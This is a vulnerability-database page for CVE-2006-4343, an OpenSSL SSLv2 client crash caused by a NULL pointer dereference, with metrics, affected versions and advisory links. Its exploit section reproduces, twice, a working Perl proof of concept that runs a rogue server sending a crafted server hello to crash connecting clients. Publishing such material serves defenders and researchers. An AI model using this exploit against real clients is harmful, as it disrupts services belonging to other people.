CVE-2006-4343 : Detail

CVE-2006-4343

Memory Corruption
0.89%V3
Network
2006-09-28
16h00 +00:00
2018-10-17
18h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-476 NULL Pointer Dereference
The product dereferences a pointer that it expects to be valid but is NULL.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 4773

Publication date : 2007-12-22 23h00 +00:00
Author : Noam Rathaus
EDB Verified : Yes

#!/usr/bin/perl # Copyright(c) Beyond Security # Written by Noam Rathaus - based on beSTORM's SSL Server module # Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response use strict; use IO::Socket; my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); die "Could not create socket: $!\n" unless $sock; my $TIMEOUT = 0.5; my $line; my $new_sock; srand(time()); while ( $new_sock = $sock->accept() ) { printf ("new connection\n"); my $rin; my $line; my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); my $ciphers = ""; my $ciphers_length = pack('n', length($ciphers)); my $certificate = ""; my $certificate_length = pack('n', length($certificate)); my $packet_sslv2 = "\x04". "\x01". # Hit (default 0x01) "\x00". # No certificate "\x00\x02". $certificate_length. $ciphers_length. "\x00\x10". # Certificate $certificate. # Done # Ciphers $ciphers. # Done "\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); $packet_sslv2 = $ssl_length . $packet_sslv2; print $new_sock $packet_sslv2; close($new_sock); } # milw0rm.com [2007-12-23]
Exploit Database EDB-ID : 28726

Publication date : 2006-09-27 22h00 +00:00
Author : Noam Rathaus
EDB Verified : Yes

source: https://www.securityfocus.com/bid/20246/info OpenSSL is prone to a denial-of-service vulnerability. A malicious server could cause a vulnerable client application to crash, effectively denying service. #!/usr/bin/perl # Copyright(c) Beyond Security # Written by Noam Rathaus - based on beSTORM's SSL Server module # Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response use strict; use IO::Socket; my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); die "Could not create socket: $!\n" unless $sock; my $TIMEOUT = 0.5; my $line; my $new_sock; srand(time()); while ( $new_sock = $sock->accept() ) { printf ("new connection\n"); my $rin; my $line; my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); my $ciphers = ""; my $ciphers_length = pack('n', length($ciphers)); my $certificate = ""; my $certificate_length = pack('n', length($certificate)); my $packet_sslv2 = "\x04". "\x01". # Hit (default 0x01) "\x00". # No certificate "\x00\x02". $certificate_length. $ciphers_length. "\x00\x10". # Certificate $certificate. # Done # Ciphers $ciphers. # Done "\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); $packet_sslv2 = $ssl_length . $packet_sslv2; print $new_sock $packet_sslv2; close($new_sock); }

Products Mentioned

Configuraton 0

Openssl>>Openssl >> Version 0.9.7

Openssl>>Openssl >> Version 0.9.7a

Openssl>>Openssl >> Version 0.9.7b

Openssl>>Openssl >> Version 0.9.7c

Openssl>>Openssl >> Version 0.9.7d

Openssl>>Openssl >> Version 0.9.7e

Openssl>>Openssl >> Version 0.9.7f

Openssl>>Openssl >> Version 0.9.7g

Openssl>>Openssl >> Version 0.9.7h

Openssl>>Openssl >> Version 0.9.7i

Openssl>>Openssl >> Version 0.9.7j

Openssl>>Openssl >> Version 0.9.7k

Openssl>>Openssl >> Version 0.9.8

Openssl>>Openssl >> Version 0.9.8a

Openssl>>Openssl >> Version 0.9.8b

Openssl>>Openssl >> Version 0.9.8c

Configuraton 0

Debian>>Debian_linux >> Version 3.1

Configuraton 0

Canonical>>Ubuntu_linux >> Version 5.04

Canonical>>Ubuntu_linux >> Version 5.10

Canonical>>Ubuntu_linux >> Version 6.06

References

http://www.mandriva.com/security/advisories?name=MDKSA-2006:172
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/22212
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4750
Tags : vdb-entry, x_refsource_VUPEN
https://www.exploit-db.com/exploits/4773
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/23915
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1016943
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/23038
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.trustix.org/errata/2006/0054
Tags : vendor-advisory, x_refsource_TRUSTIX
http://www.debian.org/security/2006/dsa-1195
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/23309
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4401
Tags : vdb-entry, x_refsource_VUPEN
http://www.ubuntu.com/usn/usn-353-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/22116
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/22166
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2006-0695.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/23340
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22385
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22758
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22487
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22772
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22165
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/23794
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=130497311408250&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/22220
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/23680
Tags : third-party-advisory, x_refsource_SECUNIA
http://openvpn.net/changelog.html
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/25889
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4036
Tags : vdb-entry, x_refsource_VUPEN
http://openbsd.org/errata.html#openssl2
Tags : vendor-advisory, x_refsource_OPENBSD
http://secunia.com/advisories/30124
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ingate.com/relnote-452.php
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/22626
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/29263
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/22083
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDKSA-2006:178
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.vupen.com/english/advisories/2006/3869
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22544
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22298
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22130
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25420
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31492
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/1973
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22284
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2008-0629.html
Tags : vendor-advisory, x_refsource_REDHAT
http://security.gentoo.org/glsa/glsa-200610-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://issues.rpath.com/browse/RPL-613
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/26329
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22260
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/0343
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/3860
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/23280
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4264
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22193
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/23155
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22799
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4417
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/386964
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=bugtraq&m=130497311408250&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.serv-u.com/releasenotes/
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2006/4443
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22094
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22186
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22500
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA06-333A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/22216
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3820
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2007/1401
Tags : vdb-entry, x_refsource_VUPEN
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.vupen.com/english/advisories/2006/3936
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22240
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22330
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2006/dsa-1185
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/22207
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2006:177
Tags : vendor-advisory, x_refsource_MANDRIVA
http://securitytracker.com/id?1017522
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/3902
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2007/2783
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22259
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22460
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22791
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/22172
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/28276
Tags : vdb-entry, x_refsource_BID
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.securityfocus.com/bid/20246
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/24950
Tags : third-party-advisory, x_refsource_SECUNIA
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1
Tags : vendor-advisory, x_refsource_SUNALERT